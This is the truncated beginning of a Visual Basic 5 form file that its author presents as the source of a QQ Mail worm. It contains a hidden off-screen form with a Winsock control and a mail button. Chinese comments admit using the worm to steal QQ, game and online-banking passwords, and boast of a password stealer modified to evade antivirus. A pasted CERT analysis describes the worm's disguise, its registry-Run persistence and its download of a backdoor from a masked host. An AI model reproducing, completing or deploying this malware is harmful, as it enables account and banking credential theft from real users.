VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form Form1 
   BorderStyle     =   0  'None
   Caption         =   "Default IME"
   ClientHeight    =   2925
   ClientLeft      =   -11340
   ClientTop       =   2070
   ClientWidth     =   4215
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   ScaleHeight     =   2925
   ScaleWidth      =   4215
   ShowInTaskbar   =   0   'False
   Begin VB.Timer Timer1 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   1920
      Top             =   1080
   End
   Begin VB.Timer Timer2 
      Interval        =   1000
      Left            =   1200
      Top             =   960
   End
   Begin MSWinsockLib.Winsock Winsock1 
      Left            =   0
      Top             =   1320
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.CommandButton Command1 
      Caption         =   "發郵件"
      Height          =   375
      Left            =   60
      TabIndex        =   0
      Top             =   60
      Width           =   1035
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'---------------------------------------------------------
'本代碼僅供學習之用,由本代碼引起的一切問題,本人概不負責.
'---------------------------------------------------------
'*******************************************************************************
'這是一個蠕蟲，利用騰訊的QQ郵箱來傳播的。現已失效，也許是因為這個蠕蟲吧。
'現在發布出來跟大家共享一下，本人只會VB，編程序慣有點亂（管他呢，只要
'自己看得懂，電腦看得懂就行了）
'
'這是在Windows XP SP2,VB5.0下編譯,可以在Win9X/2000/XP下運行，這也是因為VB5
'都會自帶運行庫，注釋是后面寫的，看不懂不要問我。
'
'聲明：自從這個蠕蟲放出去后，這又是一個盜網上銀行密碼的，絕大部分游戲密碼等等
'      實際上，我只用來盜QQ（當然現在QQ是一把啊），其它的密碼基本沒時間看。
'
'我沒有過人之處,用的都是別人的代碼.只不過在上面加點,刪點就出來了
'
'密碼解霸的功能強大,本人用的是密碼解霸2.03(本人就喜歡用這個),被本人修改過,可以
'躲過查殺
'
'作者:wpzkq
'QQ:10000      哪敢留QQ啊,給騰訊知道,不封才怪
'Email:wpzkq@eyou.com
'如有轉載,請保留完整
'===================================================================================
'***********************************************************************************
'以下是網上找來的,加<<是本人添加
'***********************************************************************************
'===================================================================================
'警惕最新QQ.Email蠕蟲
'
'安天CERT小組
'一?概述
'病毒名稱: Email -Worm.Win32.VB.ac'
'文件大小：13.279k
'編寫語言：Microsoft Visual Basic           <<VB5.0
'殼類型：UPX-Scrambler RC1.x -> ㎡nT畂L
'
'近兩日，眾多QQ用戶經常接到別人發來的QQ郵件，請小心不要打開查看，以免中木馬。
'該蠕蟲使用文本圖標和.txt.exe擴展名偽裝自身，誘導用戶執行蠕蟲體。
'
'
'二、分析：（vvv是被屏蔽掉的連接）
'
'
'1、 蠕蟲運行后，會彈出一個文件格式無效的對話框，迷惑用戶，并將自身拷貝到系統目錄%system%為：
'C:\WINDOWS\system32\Inetdbs.exe 文件屬性為：RHS
'同時將自身加入到系統注冊表啟動項目:
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
'鍵名：Inet DataBase 鍵值："C:\WINDOWS\System32\Inetdbs.exe"
'
'
'
'2、然后蠕蟲會到：http://www.vvv.com/image/new.jpg下載一個139.264字節的new.jpg文件，此文件為PE格式，使用PEncrypt 3.1 Final加殼，實際為Backdoor.PowerSpider.a，即國內流傳的密碼解霸。
'
''
'
'3、將下載的new.jpg改名為~DF41F8.EXE并執行。執行后釋放將自身拷貝到系統目錄：
'拷貝文件為:
'C:\WINDOWS\system32\mstext32.dll 7KB
'C:\WINDOWS\system32\